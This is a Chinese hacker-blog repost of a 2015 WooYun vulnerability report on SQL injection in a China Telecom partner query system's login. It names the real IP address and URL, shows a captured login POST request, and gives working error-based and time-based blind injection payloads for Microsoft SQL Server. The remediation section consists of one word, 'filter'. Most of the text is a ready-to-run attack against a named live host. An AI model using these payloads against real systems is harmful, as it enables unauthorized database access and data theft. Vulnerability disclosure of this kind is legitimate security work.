记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国电信全国联网某业务查询系统存在sql注入

2015-06-30 01:15

url:http://118.85.207.145:8080/security/authen

中国电信全国联网声讯业务合作伙伴查询系统

QQ截图20150509174710.jpg





系统存在登录框POST注入

登录后抓包

code 区域
POST http://118.85.207.145:8080/eapsoa/AjaxAdapter HTTP/1.1

Accept: */*

Accept-Language: zh-cn

Referer: http://118.85.207.145:8080/security/authen

Content-Type: application/x-www-form-urlencoded;

UA-CPU: AMD64

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Host: 118.85.207.145:8080

Content-Length: 241

Connection: Keep-Alive

Pragma: no-cache

Cookie: JSESSIONID=D0A68C8EB1EEB02034D4285B9885E97D; STICK_EAP_TOKEN=OPENEAP_NODE_NAME.



<service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><parameter index="1" type="string">admin</parameter><parameter index="2" type="string">admin</parameter><parameter index="3" type="string"></parameter></parameters> </service>

漏洞证明:

code 区域
---

Parameter: XML (generic) #2* ((custom) POST)

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: <service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><

parameter index="1" type="string">admin' AND 4010=CONVERT(INT,(SELECT CHAR(113)+

CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4010=4010) THEN CHAR(

49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'a

kTN'='akTN</parameter><parameter index="2" type="string">admin</parameter><param

eter index="3" type="string"></parameter></parameters> </service>



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: <service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><

parameter index="1" type="string">admin' WAITFOR DELAY '0:0:6'--</parameter><par

ameter index="2" type="string">admin</parameter><parameter index="3" type="strin

g"></parameter></parameters> </service>

---



QQ截图20150509174950.jpg



QQ截图20150509175017.jpg

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0113085

阅读:105595 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“中国电信全国联网某业务查询系统存在sql注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云